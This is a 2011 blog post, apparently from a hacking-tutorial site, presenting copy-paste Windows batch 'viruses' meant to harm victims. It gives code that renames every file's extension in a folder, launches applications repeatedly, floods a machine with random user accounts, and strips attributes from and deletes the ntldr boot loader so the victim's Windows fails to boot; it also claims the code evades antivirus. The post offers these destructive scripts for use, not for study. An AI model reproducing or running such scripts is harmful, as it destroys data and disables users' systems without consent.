June 27, 2011


Welcome to (HACKING begins - "An approach to introduce people with the truth of HACKING"), This is on demand post for our readers so guys get ready for some batch viruses. These are some simple codes just copy and paste then in Notepad and save then with extension .bat.

In my previous post BEGINNERS GUIDE TO BATCH PROGRAMMING is basic for BATCH programming, If you are not friendly with batch file read article first. Now I'm gonna show you some Batch Viruses which are undetectable to AV but effect people on huge basis.  

What can batch viruses do ?

 Change extension of all files in a folder
This is a simple hack to change extension of all files of folder.
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
ren *.* *.mp3
  •  Save the file with .bat extension like anything.bat. You can change extension of code with anything like .jpg,.exe,..bat,.dll etc 

Application Bomber
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
@echo off
start winword 
start mspaint 
start notepad
start cmd 
start explorer
start control
start calc 
goto x 
  • Save the file with .bat extension like anything.bat.

User Account Flooder 
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
net user %random% /add
  • Save the file with .bat extension like anything.bat.

Deleting Boot files

Goto C drive in Win XP , Tools---Folder Option---View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 

 Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.  

  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
attrib -S -R -H C:\ntldr 
del ntldr    
  •  Save the file with .bat extension like anything.bat.
When victim reboot system it shows error

 Related Post :


 Hope this was informative, kindly post your views or comments on this article . Suggestions are welcomed.

Be a real hacker - PROFESSIONAL, and change the trend of HACKING.

Thanks & Regards:

Sahil Mahajan.

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I hope you got some great ideas in this post! Please feel free to share additional ideas or query.